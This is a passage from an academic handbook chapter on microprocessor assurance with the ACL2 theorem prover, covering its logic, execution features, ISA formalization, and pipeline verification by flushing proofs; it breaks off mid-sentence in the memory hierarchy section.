Vizel Y, Ivrii A (2022) Bit level model checking algorithms. In: Chattopadhyay A (ed) Handbook
of computer architecture. Springer
VossII (2020). https://github.com/TeamVoss/VossII. Accessed: 8 June 2021
Yang J, Seger C-J (2003) Introduction to generalized symbolic trajectory evaluation. IEEE Trans
Very Large Scale Integr (VLSI) Syst 11(3):345–353
Microprocessor Assurance and the Role
of Theorem Proving 37
Shilpi Goel and Sandip Ray
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1322
ACL2 Preliminaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1324
Logic Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1325
Extension Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1327
The Theorem Prover . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1328
Some Execution Features: Guards, MBE, and Stobjs . . . . . . . . . . . . . . . . . . . . . . . . . . . 1329
ISA Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1332
ISA Formalization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1333
Mechanical Analysis for ISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1334
Binary Code Analysis with ISA Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1335
Some Formalized ISAs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1336
Analysis of Microarchitecture Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1338
Pipelining, Out-of-Order, and Speculative Executions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1338
Reasoning About Memory Hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1342
Verification of Execution Units . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1343
Deep Dive: Formalization and Analysis of (Simplified) x86 . . . . . . . . . . . . . . . . . . . . . . . . . 1345
Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1345
Application: Verifying x86 Instruction Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . 1350
The work presented in this chapter was done when this author was at Centaur Technology, Inc.,
and prior to that, The University of Texas at Austin.
S. Goel
Intel Corporation, Austin, TX, USA
e-mail: [email protected]
S. Ray ()
Department of ECE, University of Florida, Gainesville, FL, USA
e-mail: [email protected]
Abstract
Keywords
Introduction
a trusted computer program which is responsible for guiding the proof process
and checking the validity of the constructed proof. When successful, the approach
provides a high assurance in the reliability of the system, viz., a mathematical
guarantee of its correctness up to the accuracy of the model and the soundness of the
computer program employed in the reasoning process. The approach is particularly
enticing since, unlike simulation and testing, the guarantee is provided for all system
executions.
This chapter focuses on microprocessor verification research through a
quintessential formal verification technique: mechanical theorem proving. In this
approach, the focus is to formalize and prove – with the assistance of a computer
program referred to as the theorem prover – properties of computing systems just
like one would prove any other mathematical formula, using standard mathematical
techniques like induction, term rewriting, generalization, etc. Theorem provers are
general-purpose tools which have been used to prove mathematical results as well
(Shankar 1997; Russinoff 1992; Paulson 1993, 1995). Typically, no specialized
mathematical foundation is provided specifically for microprocessor proofs per
se, although certain proof techniques might be better suited for verifying certain
properties. One consequence of the generality is that theorem proving is not
automatic in general, and its successful use for proving nontrivial theorems about
complicated systems depends on significant interaction with a trained user. The
user must be familiar with the formal logic of the theorem prover as well as the
nuances of the system being verified. Interacting with a theorem prover “feels” like
constructing a very careful mathematical argument for its correctness, with the
prover checking the correctness of the low-level details of the argument. Contrast
this with other so-called “automated” formal verification approaches like model
checking, equivalence checking, or assertion-based verification, where the logic
and formalism used is specifically tailored for capturing properties of computing
systems; verification reduces to an algorithm to check if the system (modeled using
that formalism) satisfies the property.
Obviously, all other things remaining equal, employing an automated verification
tool is preferable to a framework that requires the close involvement of a trained
user. Why then would one want to use theorem proving rather than the more
automated approaches? The key reason is that other things are not equal. In
particular, automated algorithms incur high computational complexity. In practice,
they can only be fully automatic for very small systems; for larger systems, these
approaches are limited by the available time or memory. Furthermore, most theorem
provers afford a substantial degree of control in the process of derivation of complex
theorems. This can be exploited by the user in different forms, typically by proving
key intermediate lemmas that assist the theorem prover in its proof search. By
manually structuring and decomposing the verification problem, the user can guide
the theorem prover into proofs about very complex systems.
There are several theorem provers available today, including ACL2 (Kaufmann
et al. 2000b), Coq (Dowek et al. 1991), Forte (Aagard et al. 2000), HOL (Gordon
and Melham 1993), Isabelle (Nipkow et al. 2002), and PVS (Owre et al. 1992).
The underlying logics of theorem provers vary considerably, spanning across set
theory, constructive type theory, first-order logic, higher-order logic, etc. There is
also substantial difference in the amount of automation provided by the different
theorem provers; some are proof checkers, while others can do a considerable
amount of unassisted reasoning. Different theorem provers have been employed for
reasoning about a variety of architectural, microarchitectural, and hardware features
of microprocessors. It is impossible to provide a thorough account of all this work
in a single chapter. Rather this chapter reviews some key highlights of this extensive
research. We will discuss how different features are formalized, provide a flavor of
the modeling and reasoning involved, and recount some of the success stories in
application of theorem proving in this area on a large scale. We will use the ACL2
theorem prover (Kaufmann et al. 2000a,b) for illustrating many of the reasoning and
concepts involved. ACL2 has been used extensively for verification of a variety of
microarchitectures, ranging from different (simplified) variants of x86 to JVM
bytecode. However, we use ACL2 only for demonstration purposes. No prior
knowledge of the theorem prover is assumed, and many of the approaches discussed
are applicable to other theorem provers as well. A basic overview of ACL2 features
relevant to the discussion will be provided in Section “ACL2 Preliminaries”.
The remainder of the chapter is organized as follows. Section “ACL2 Pre-
liminaries” presents the relevant background on theorem proving, including the
overview of ACL2 mentioned above. Section “ISA Analysis” presents approaches
to formalize the Instruction Set Architectures (ISAs) and recounts application of
theorem proving at this architectural level. Section “Analysis of Microarchitecture
Properties” provides a similar overview of verification of microarchitecture features,
including pipelining, cache coherence, and execution units. In Section “Deep Dive:
Formalization and Analysis of (Simplified) x86”, we dive deeper into one specific
formalization work, viz., the use of ACL2 in reasoning about x86. Section “Theorem
Proving Beyond Microarchitecture” goes a bit beyond architecture in two ways: the
use of theorem proving to verify hardware implementation of specific microarchi-
tecture components on the one side and software binaries on the other. We conclude
in Section “Conclusion”.
ACL2 Preliminaries
a machine execution via functions such as step and run), we should understand
what it means for doing so in a theorem prover and how it is reconciled with the
logic. Second, theorems that correspond to properties of large computing systems
are themselves complex. Many of the theorems can take megabytes even to state!
Enabling mathematical proofs at this scale requires a variety of automated reasoning
features, and it is important that the reader understands the flavor of the features and
scale of engineering involved in practical theorem proving systems. All that said,
the reader does not need to understand everything about the underlying system to
follow the discussions in the next sections. We encourage the reader to skim this
section to get a general idea and come back to it later as a reference when they want
to understand how the models and theorems presented in later sections are really
formalized in the logic.
Logic Basics
A formal logic consists of (1) a formal language for describing formulas, (2) a set of
formulas called axioms, and (3) a set of inference rules that allow derivation of new
formulas from old ones. The key idea is to interpret the axioms as (self-evident)
truths for the artifact (or universe) being modeled by the logic and the inference
rules as validity preserving; consequently, any formula (referred to as theorem)
derived from axioms by applying a sequence of inference rules will also be true.
We will use the logic of the ACL2 theorem prover for most formulas shown in this
chapter. This logic is a quantifier-free first-order logic of recursive functions with
equality. The kernel of the ACL2 logic (Kaufmann and Moore 1997) consists of a
formal syntax, axioms, and some rules of inference. The kernel syntax describes
terms composed of variables, constants, and function symbols applied to a fixed
number of argument terms. The kernel logic introduces the notion of “formulas”
as composed of equalities between terms and the usual propositional connectives.
The logic supported by the theorem prover is an extension of the kernel logic as
described below.
The syntax of ACL2 is the prefix-normal syntax of Lisp (CLHS (Common
Lisp HyperSpec)): the application of a binary function f on arguments a and b
is represented by (f a b) rather than the more traditional f (a, b). However, in
this chapter, we typically use the latter form, referring to the formal syntax only
when it is relevant for the discussion. We also use more conventional notations
for commonly used functions, thus writing (x × y) instead of (* x y) and
(if x then y else z) instead of (if x y z), dropping parentheses when it is
unambiguous to do so.
ACL2 has axioms specifying properties of certain Common Lisp primitives. We
show below the axioms about the primitives equal and if. Note that the kernel
syntax is quantifier-free, and each formula is implicitly universally quantified over
all free variables in the formula.
Axioms.

x = y ⇒ equal(x, y) = T
x ≠ y ⇒ equal(x, y) = NIL
x = NIL ⇒ (if x then y else z) = z
x ≠ NIL ⇒ (if x then y else z) = y

Axiom.

equal(car(cons(x, y)), x)
The axiom stands for the formula equal (car (cons (x, y)), x) ≠ NIL, which
is provably equal to car (cons (x, y)) = x. In this chapter, we will feel free to
interchange terms and formulas by the above convention. We will also apply the
same logical connectives to a term or formula; thus, when we write ¬τ for a term
τ , we mean the term (or formula) not (τ ), where not is axiomatized as follows.
Axiom.
not(x) = if x then NIL else T
The duality between terms and formulas enables us to interpret an ACL2 theorem
as follows. If the term τ (interpreted as a formula) is a theorem, then for all
substitutions σ of free variables in τ to objects in the ACL2 universe, the (ground)
term τ/σ evaluates to a non-NIL value; NIL can thus be viewed as logical false.
The kernel logic includes axioms that characterize the primitive Lisp functions
over numbers, characters, strings, constant symbols such as T and NIL, and ordered
pairs. These objects together make up the ACL2 standard universe, but the axioms
do not preclude “nonstandard” universes which may contain other objects. Lists
are represented as ordered pairs, so that the list (1 2 3) is represented by
the term cons (1, cons (2, cons (3, NIL))). For brevity, we will write list (x, y, z)
as an abbreviation for cons (x, cons (y, cons (z, NIL))). Another convenient data
structure built out of ordered pairs is the association list (or alist), which is
essentially a list of pairs, e.g., list(cons("a", 1), cons("b", 2)). We often
use alists for describing finite mappings; the above alist can be thought of as a mapping
that associates the strings "a" and "b" with 1 and 2, respectively.
In addition to propositional calculus and equality, the rules of inference include
instantiation and well-founded induction up to ε0. (Here ε0 is the least ordinal ε
satisfying ω^ε = ε.) The induction rule corresponds to assuming, for each formula ϕ,
the following axiom schema, where y ranges over ordinals below ε0 and “≺” denotes
the order on ordinals:

Induction Axiom Schema.
[(∀y ≺ ε0) (((∀x ≺ y) ϕ(x)) ⇒ ϕ(y))] ⇒ (∀y ≺ ε0) ϕ(y)
The formula may appear a bit complicated at first glance and can be skipped on
a casual read. For the reader interested in understanding what it stands for, it can be
interpreted as follows. Let y be an ordinal less than ε0 and consider a formula ϕ(y).
Suppose we can prove that if ϕ(x) holds for each x ≺ y, then we can also prove
ϕ(y). That is, by assuming all smaller instances (according to the relation “≺”) of
the formula ϕ(x), we can prove ϕ(y). Then the formula ϕ(y) holds. Note that this is
the crux of traditional induction, except that the concepts are adapted to induction
on ordinals up to ε0 (rather than natural numbers). ACL2 implicitly assumes all such
formulas as axioms.
Finally, ACL2 only allows construction of theories that are extensions of GZ (the
initial “ground-zero” theory comprising the kernel axioms) via the extension
principles explained below, which allow axiomatization of new function symbols.
When a new function symbol is introduced via the extension principles, the resulting
theory T′ is the extension of the original theory T with (i) the axiom explicitly
introduced by the extension principle and (ii) all the induction axioms in the
language of the new theory.
Extension Principles
ACL2 provides extension principles allowing the user to introduce new function
symbols. Below, we discuss one extension principle which is particularly relevant
to us, i.e., the definitional principle for introducing totally defined functions. Other
extension principles include an encapsulation principle for introducing partially
defined or constrained functions, a defchoose principle for introducing Skolem
(choice) functions, and a defaxiom principle that enables the specification of a
formula as an axiom. The latter is discouraged since the introduction of arbitrary
axioms is potentially unsound. For this chapter, unless explicitly mentioned other-
wise, we ignore introduction of arbitrary axioms.
The definitional principle allows the user to extend a theory by axiomatizing new
total (recursive) functions. For example, one can use this principle to introduce the
unary function symbol fact axiomatized as follows, which returns the factorial of
its argument.
Definitional Axiom.
fact(x) = if zp(x) then 1 else x × fact(x − 1)

Here zp(x) is a primitive that returns NIL if x is a positive integer and T otherwise.
One can then prove the following theorem, stating that fact always returns a natural
number.

Theorem fact-is-natp.
natp(fact(x)) = T

During a proof attempt, ACL2 represents each goal as a clause
(¬τ1 . . . ¬τn τ), which is viewed as the disjunction of its elements (literals). ACL2
has a hint mechanism which the user can use to provide pragmatic advice on
proof search at any goal or subgoal; in this example, the user can advise ACL2
to begin the search by inducting on x. Once a theorem is proven, it is stored in a
database and used in subsequent derivations. This database groups theorems into
various rule classes, which affects how the theorem prover will automatically apply
them. The default rule class is rewrite, which causes the theorem prover to replace
instances of the left-hand side of an equality with its corresponding right-hand side;
if the theorem fact-is-natp above is stored as a rewrite rule, then if ACL2
subsequently encounters a term of the form natp(fact (τ )), then the term is rewritten
to T.
ACL2 is closely tied with Common Lisp. It employs Lisp syntax, and as of
this writing, ACL2 can be built on top of all major Common Lisp distributions
(Allegro Common Lisp, CCL, GCL, LispWorks, and SBCL). Furthermore, events
corresponding to the definitional principle are Lisp definitions. For instance, the
formal event introducing fact also serves as a Common Lisp definition:
(defun fact (n)
(if (zp n)
1
(* n (fact (- n 1)))))
The connection with Lisp enables users to execute formal definitions efficiently;
ACL2 permits the execution of all functions axiomatized in GZ, as well as any
function whose definition does not involve any constrained functions. The theorem
prover makes use of this connection for simplifying ground terms. For instance,
during a proof, ACL2 will automatically simplify fact (3) to 6 by evaluation (also
referred to as “concrete execution”).
The fact that the same functions are used for concrete execution as well as formal
reasoning offers the advantage that a model of a computing system built in ACL2
can be validated against the real system or a trusted “golden” model by running
co-simulations. This increases confidence in the accuracy of the formal model and,
by extension, in the guarantees offered by formal analysis done using this model.
For instance, one accomplishment of ACL2 is the formal verification of a formal
microarchitectural model of Rockwell Collins AAMP™ processor (Greve et al.
2000). The formal proof shows that the formal model satisfies the desired property
but leaves open the possibility that the physical artifact has not been accurately
captured by the formalization. The latter question can be effectively answered (and
was in fact addressed in this case) by extensive co-simulation of the actual artifact
with the formal model. The x86 formalization we discuss in Section “Deep Dive:
Formalization and Analysis of (Simplified) x86” has also been “vetted” with the
real implementation through such co-simulation. Below, we discuss some features
offered by ACL2 to optimize the execution efficiency of its functions.
Guards
ACL2 functions are total: the axioms assign a value to every function on every
object. Common Lisp functions, in contrast, may be specified on only part of
their domains; e.g., Common Lisp specifies car(x) only when x is a list, while the
ACL2 axioms characterize car on every object.
The above implies that (1) it is unsound to simply execute a function in Lisp to
determine the return value specified by the axioms on concrete inputs if the inputs
are outside the intended domain, but (2) it is sound to do so if the inputs are within
the intended domain. The notion of guards formalizes this idea of intended domain.
The guard of a function is a formula G characterizing its intended domain: if the
inputs satisfy G, then the value computed by Common Lisp is consistent with the
value specified by the ACL2 axioms. For instance, the guard of car(x) is the
formula consp(x) ∨ (x = NIL).
The notion of guards extends to user-defined functions as well. For example,
consider defining a new function two as follows. The function always returns the
number 2 (and can be proven as such by ACL2).
Definitional Axiom.
two(x) = if eq(car(x), 0) then 2 else 2
In order to use Common Lisp for evaluating the function two, the guard of every
function called in its body must be satisfied. Here there are two such functions,
both Common Lisp primitives: eq and car. The function eq is simply equality,
but implemented as a faster variant via a pointer check. The guard for
eq(x, y) is symbolp(x) ∨ symbolp(y), where symbolp returns T when its argument
is a symbol and NIL otherwise. Putting this together with the guard of car, the
guard of the function two is given by the formula consp(x) ∧ symbolp(car(x)).
Must Be Equal
ACL2 uses guards to support other, more sophisticated features for fast
execution. One such feature is must-be-equal (MBE for short) (Greve et al. 2008).
The key idea is to allow two definitions of a function: one used for logical
reasoning (e.g., in proofs) and another for efficient execution. To motivate the
idea, consider the function lng below, which computes the length of a list.
Definition.
lng(x) = if endp(x) then 0 else 1 + lng(cdr(x))
Here, endp(x) is a primitive that (under the guard below) recognizes the empty
list, and cdr is a primitive Lisp function that takes a list as argument and
returns the list with its first element removed. The function lng
can have a guard consp(x) ∨ (x = NIL), and such a guard can be verified by
ACL2. Even after guard verification, however, evaluation of lng on a large list
argument with Common Lisp will typically encounter a stack overflow because of
the recursive call. A more execution-friendly definition could be the following:
Definition.
lnga(x, acc) = if endp(x) then acc else lnga(cdr(x), acc + 1)
Since the function lnga is tail recursive, good Common Lisp compilers will
compile this function into a simple loop with no stack allocation on recursive
function calls. On the other hand, it is a more complex function to reason about.
The MBE feature enables the user to use these two different definitions of lng – the
user uses the first definition as a logical definition and the second with a directive to
use for execution purpose only.
Definition.
(defun lng (x)
  (declare (xargs :guard (or (consp x) (equal x nil))))
  (mbe :logic (if (endp x) 0 (+ 1 (lng (cdr x))))
       :exec  (lnga x 0)))
The guard for MBE includes the proof obligation that the two definitions are
equal (under the guard of the function), a nontrivial one-time cost. This proof
obligation is part of the guard verification, i.e., conceptually, one imagines the guard
of MBE to be the requirement that the two definitions are logically equivalent.
Single-Threaded Objects
The third execution feature of ACL2 we cover in this chapter is single-threaded
objects (“stobj” for short), which provide the benefit of destructive updates (Boyer
and Moore 2002). Note that a fundamental tenet of mathematics is that the
function f (x) returns the same value for each invocation with the same argument
x; i.e., (x = y) =⇒ (f (x) = f (y)). This notion is, of course, not true if f is
implemented in a computer program (even if f does not have side effects) where
x is a variable: x can be updated (e.g., by an assignment) between two successive
invocations of f (x). The idea of stobjs is to enable declaration of variables that can
be destructively updated while enabling logical reasoning. Following is an ACL2
declaration that defines the variable obj to be a single-threaded object.
(defstobj obj
(field-a :type (array (unsigned-byte 64) (1024)))
(field-b :type (signed-byte 16)))
Logically, obj is a list of two elements; the first element field-a is itself a
list of 1,024 elements, each of which is a 64-bit unsigned integer, and the second
element field-b is a 16-bit signed integer. Under the hood, obj is implemented
as a one-dimensional array with field-a defined as a simple array of 1,024 64-
bit unsigned integers and field-b as another simple array containing 1 16-bit
signed integer element. Furthermore, the above declaration also defines functions
update-obj , update-field-a, update-field-b, etc. Logically, update-field-a returns
a (new) list with the appropriate entry updated, update-field-b returns a new value,
and update-obj returns a new pair. However, again under the hood, the updates are
actually implemented destructively on the object obj. The logical view is recon-
ciled with the implementation by enforcing syntactic restrictions on the manner in
which the functions manipulating stobjs can be invoked. Roughly, every function
that updates (any field of) a stobj must return the updated stobj. Furthermore,
updates to different fields of stobj are sequentialized, and two functions f and g
cannot take the same stobj and update different fields; instead, f (resp., g) must
take the updated stobj returned by g (resp., f ) to perform its own updates.
Single-threaded objects are crucial to defining efficient ISA and microarchitec-
tural models. As we will see in the next section, these models often involve defining
how different instructions update machine states. Fast simulation of these models
depend on fast (destructive) updates to machine states. In the x86isa model,
discussed in Section “Deep Dive: Formalization and Analysis of (Simplified) x86”,
we will see the use of stobjs to specify the x86 machine state.
ISA Analysis
An ISA defines the interface that a processor presents to software: the view
provided is of a machine that executes (binary) code one instruction at a
time. This section discusses ISA formalization and its applications.
ISA Formalization
Definition.
ISA.run(s, n) = if zp(n) then s else ISA.run(ISA.step(s), n − 1)

Here ISA.step(s) denotes the architectural state obtained by executing the single
next instruction on state s.
The function ISA.run computes the architectural state of the machine after execut-
ing n instructions. The function ISA.step (and correspondingly, ISA.run) formalize
the ISA, but they are mathematical functions about which one can prove different
properties. Here is one such “obvious” property about the ISA.run function, which
is easy to prove by induction on m. Note that the property is true for ISA.run
independent of the definition of ISA.step.
Lemma.
ISA.run(ISA.run(s, m), n) = ISA.run(s, m + n)
The above lemma is illustrative and fundamental. But it is not perhaps “inter-
esting” to an architect looking to verify properties of a specific ISA. However,
one can verify ISA-specific properties as well. One interesting direction is to
relate two different ISA models. In particular, consider designing an abstract and
highly simplified ISA model specified by the function ISA.abstract.step that
defines arithmetic operations as mathematical functions. For instance, we define the
corresponding effect function ISA.abstract.effect such that if the instruction I is
an ADD, then the result stored in the target register is the infinitely precise
mathematical sum of the operands. Obviously, such an ISA would not be realizable in
any practical architecture. But it is a useful mathematical abstraction, since after all
we think about the ADD operation as some approximation of the mathematical sum.
Once this is done, we can, of course, formalize another more elaborate ISA model
ISA.practical.step in which the arithmetic operations are formalized to include all
practical bells and whistles, e.g., rounding, truncating, overflow and underflow flags,
etc. We can then prove a theorem roughly stated as follows:
If a program never raises any overflow or underflow errors, then the execution of the
program on the simplified ISA model has the same effect as executing it under the more
elaborate model.
This sort of result is discussed further in Section “Some Formalized ISAs”; we bring
up one instance here to illustrate a specific proof that was done to show
correspondence between two models M3 and M4. The
key difference between the two models is multi-threading: M4 is a multi-threaded
model while M3 is not. A theorem that was formalized and mechanically proven by
ACL2 relating these two machines can be roughly paraphrased as follows.
Let π be any M4 program that never spawns a thread. Then, the effect of executing π on
M4 is the same as the effect of executing π on M3.
Of course, care is necessary to make the statement precise. Formalizing the state-
ment “the effect is the same in both machines” entails designing a function (referred
to as the projection function) that takes an M4 state s, eliminates components that
are irrelevant to multithreading (e.g., registers keeping track of different threads),
and creates a state s′ that can be used by the state transition function for M3.
As an illustration, consider the following simple program, annotated (in braces) with
assertions:
1: X:=0; {T}
2: Y:=10;
3: if (Y ≤ 0) goto 7; {(X + Y) = 10}
4: X:=X+1;
5: Y:=Y-1;
6: goto 3;
7: HALT {X = 10}
The clock function for this program can be defined as follows. Note that the
definition closely mimics the actual loop structure of the program. In particular,
consider the function lpc (which stands for “loop clock”). If the machine is in a
state s where the program counter has the value 3, then lpc (s) merely counts the
number of steps before the loop is exited.
Definition.
lpc(s) = if zp(Y(s)) ∨ ¬prog-loaded(s) then 0 else 4 + lpc(ISA.run(s, 4))
clock(s) = 2 + lpc(ISA.run(s, 2)) + 1
Once the appropriate clock function is defined, we can try to prove the total
correctness theorem. To do so, we must prove a theorem that characterizes the loop
itself. One possibility is to prove the following lemma:
Lemma.
prog-loaded(s) ∧ (pc(s) = 3) ⇒ ISA.run(s, lpc(s)) = upd(s, X(s) + Y(s), 0)
Here, upd (s, a, b) is the state obtained by assigning the value a to component X
and the value b to component Y, respectively, in state s. The formula can be proven
as a theorem by induction based on the term lpc (s). The proof of the theorem
Total Correctness then follows from this theorem and the lemma on the
composition of ISA.run.
Some Formalized ISAs
Formal ISA models have long been used as a specification for the verification of
processor microarchitectures as well as machine code. Hunt's FM8501 processor (Hunt
1994) was an early case study which successfully expressed a generic processor’s
specification and design in the formal logic of a theorem prover. The CLI stack
project (Bevier et al. 1989) used NQTHM (Boyer et al. 1995), a predecessor of the
ACL2 theorem prover, to formally verify a “stack” of systems, from a gate-level
microprocessor design (Hunt 1989) to an assembler (Moore 1996) that compiled to
this microprocessor and, finally, a higher-level language (Young 1989) that targeted
this assembler. The CLI stack set a milestone in the history of the design and
verification of software and hardware and continues to inspire many undertakings
like the recent Provably Correct Systems (ProCoS) projects (He et al. 1994). Sawada
et al. used ACL2 to verify the pipelined execution of FM9801 (Sawada and Hunt
2002b), a processor that supported speculative execution, out-of-order instruction
issue and completion, and exceptions and interrupts; the correctness property was
that FM9801’s pipelined execution from one flushed state to another is comparable
to sequential execution. Rockwell Collins developed a formal model (Greve 1998)
of their JEM1 microprocessor in the PVS theorem proving system (Owre et al. 1992)
for microcode verification. A Rockwell Collins project used ACL2 to verify that
the microcode of AAMP7G™ processor was compliant with the EAL 7 standard
security specification (Wilding et al. 2010).
Boyer and Yu formalized most of the user-mode instruction set of the Motorola
MC68020 microprocessor (Boyer and Yu 1996) in NQTHM. This ISA model was
used to verify the machine code corresponding to the Berkeley string library. Liu and
Moore formalized the Java Virtual Machine (JVM) in ACL2 (Liu and Moore 2004)
in order to reason about JVM bytecode. A subset of the x86 ISA was formalized in
ACL2 and used to perform machine-code verification of both system and application
programs. This model was later used to verify parts of the x86 microarchitecture;
details are in Section “Deep Dive: Formalization and Analysis of (Simplified)
x86”. Another specification of the x86 ISA (Degenbaev 2012) formalized the x86
instruction semantics using a domain-specific language and specified the total-store-
ordered memory model by accounting for caches, translation look-aside buffers,
fences, locks, etc.
The CHERI (Capability Hardware-Enhanced RISC Instructions) ISA (Watson
et al. 2016) is an architecture that provides software compartmentalization by
supporting a hybrid capability model (Levy 1984) at the level of the processor
itself. Formal models of CHERI ISA have been developed using L3 (Fox 2015),
a domain-specific language for instruction-set descriptions, and PVS. Recently,
Arm released executable specifications of its ISA (Arm ISA Specifications), where
instructions’ semantics have been formalized using a domain-specific specification
language called ASL. Arm has successfully used these specifications to verify
parts of the Arm microarchitecture (e.g., pipeline control logic) (Reid 2016; Reid
et al. 2016). This ASL specification has also been translated into Sail (Armstrong
et al. 2019), an open-source domain-specific language intended for specifying ISAs,
and from Sail to the Isabelle/HOL theorem prover (Nipkow et al. 2002; Gordon
and Melham 1993); the resulting Isabelle/HOL definition was used to reason
about the compartmentalization (CHERI) properties of the Arm-based Morello
architecture (Bauereiss et al. 2021).
Microarchitecture Analysis
The ISA formalization discussed in Section “ISA Formalization” shows the basics
of how one can formalize a computing system, e.g., by defining the state transition
function in the logic of the theorem prover. The high-level modeling approach
applies essentially unchanged to modeling a microarchitecture, except that the
“effect function” is more detailed. Just like the function ISA.effect (s, I ) models the
effect of executing instruction I on the architectural state s, one can define a func-
tion ma-effect (m, I ) that defines the effect of “executing” I on a microarchitectural
state m. Note that we have put the term “executing” in quotes: in a microarchitecture,
the notion of executing varies depending on the microarchitectural component being
investigated. For instance, if we are analyzing an in-order pipelined microprocessor,
ma-effect (m, I ) may define the effect on the microarchitecture state as the
instruction moves from one pipeline stage to another. On the other hand, for an
out-of-order processor, ma-effect (m, I ) would need to account for transition of the
instruction through the issue queue, reservation station, reorder buffer, etc.
Pipelining
To understand how pipelining can complicate verification, let us quickly summarize
how one can verify a non-pipelined microarchitecture. Simulation correspondence
can be informally described as follows. One defines a predicate sim as a relation
between the states of MA and ISA with the following properties: (In practice, we
use simulation for non-deterministic systems, which can be formalized with step
taking an additional argument that models a non-deterministic input. In this chapter,
we ignore issues involving non-deterministic concurrent systems.)
1. sim relates the initial states of MA and ISA.
2. If sim(m, i) holds, then sim(MA.step(m), ISA.step(i)) holds.
3. If sim(m, i) holds, then the programmer-visible (observable) components of m
and i agree.
This correspondence is often shown as a diagram such as in Fig. 2. It can be cast
as a simulation proof by defining the simulation relation as follows:
Definition.
sim(m, i) ≜ (proj(m) = i), where proj projects the programmer-visible components
of an MA state.
(Figs. 2 and 3 [diagrams not reproduced]: MA states related by MA-step; in Fig. 3,
flush arrows map each MA state to the ISA state it corresponds to.)
Flushing Proofs. One approach to address the above issue, comparing the states of a
pipelined MA with ISA states, was presented by Burch and Dill (Burch and Dill 1994)
and is known as flushing correspondence. The notion is shown pictorially in Fig. 3. To
construct an ISA state from an MA state, we simply flush the pipeline; that is,
complete all partially executed instructions in the pipeline without introducing any
new instruction. We then project the programmer-visible components of this flushed
state to create the ISA state. Then, the notion of correctness says that MA is correct
with respect to the ISA if, whenever flushing and projecting an MA state ma yields
the state isa, then for every possible next state ma′ of ma in MA, there must be a
state isa′ in ISA such that (1) isa′ can be reached from isa in one
ISA step, and (2) flushing and projecting ma′ yields isa′.
Unfortunately, flushing has its own limitation. First, note that the diagram shown
in Fig. 3, unlike the diagram in Fig. 2, does not render itself directly to a proof of
simulation correspondence or trace containment. This is because proj(flush(s))
maps a state s of the pipelined machine MA to a state with possibly different values of
the observable components (or label). Moreover, as shown in Manolios' work
(Manolios and Johnson 2000), certain types of flushing diagrams are flawed in that
trivial, obviously incorrect machines satisfy such notions of correctness.
Second, flushing cannot directly handle interrupts. This problem (i.e., microarchitectural states being
mapped by flushing to potentially inconsistent ISA states) is exacerbated with out-
of-order and speculative executions, where obviously an MA state can include
partially completed executions that may be completed in a different order than if
the system were flushed (out-of-order execution), or maybe even not completed at
all (speculative execution).
In spite of the challenges above that have so far precluded a general notion of
correctness for microprocessors with advanced control, there has certainly been
significant work on formal verification of microarchitecture models with such
features. Much of the work has been custom, i.e., specific correctness properties
proven for a specific system. One of the most comprehensive formal proofs was
from Sawada and Hunt (Sawada and Hunt 2002a), which formalized and verified a
microprocessor named FM9801 with features such as out-of-order and speculative
execution, interrupts, exceptions, and self-modifying code. The correctness proof
they verified is roughly summarized as follows:
Let MA0 be a flushed state and suppose after n transitions the microarchitecture reaches
another flushed state MAn . Let the projection of MA0 be ISA0 and let the projection of MAn
be ISAm . Suppose the interrupt register specifies a sequence of interrupts Σ. Suppose also
that there is no exception in the transition sequence of MA, and no self-modifying code is
executed. Then there is a sequence of transitions from ISA0 to ISAm and the sequence of
interrupts serviced in the process by ISA is Σ.
Of course, we note that the above theorem does suffer from the problems pointed
to by Manolios: a trivial machine that never reaches the flushed state satisfies these
criteria. However, the FM9801 machine is not a trivial microarchitecture, and the
theorem is a nontrivial result for a microarchitecture with advanced features.
We primarily focused in this section on the notion of correctness, since that is
controversial and a target of lively debate. Of course, another issue is to actually
do the proof. Without standardization, these proofs tend to be highly custom-built.
Nevertheless, some interesting insights have emerged over the years on how to
approach the verification. One critical insight is that we must define an invariant,
i.e., a predicate that holds for each microarchitectural state encountered during
execution. In other words, one defines a function inv to satisfy the following
conditions:
Invariant Properties.
1. inv holds for the initial MA state.
2. If inv(m) holds for a state m, then inv(MA.step(m)) holds.
3. If inv(m) holds, then m satisfies the desired correctness condition.
Sawada and Hunt’s work showed how to do this manually. They defined an
auxiliary structure, called MAETT, that is used for keeping track of the history
of execution of the different instructions through the pipeline. In other words,
MAETT keeps track of which instruction is at what stage of completion and how
the instruction would be expected to proceed in subsequent transitions. Then inv
simply establishes that the pipeline indeed results in an execution consistent with the
tracking of MAETT. This approach is certainly viable (as they showed) but highly
tedious. Subsequently, significant work has been done to automate invariant proving
itself, e.g., by designing techniques called predicate abstraction (Lahiri et al. 2003;
Saidi and Shankar 1999; Ray and Sumners 2007).
Memory Hierarchy
The term “memory hierarchy” refers to the hierarchy of cache levels, main memory,
and virtual memory in a modern microprocessor system. The ISA models as
described in Section “ISA Analysis” typically do not account for these features.
Instead, a LOAD or STORE instruction is typically formalized as a direct and atomic
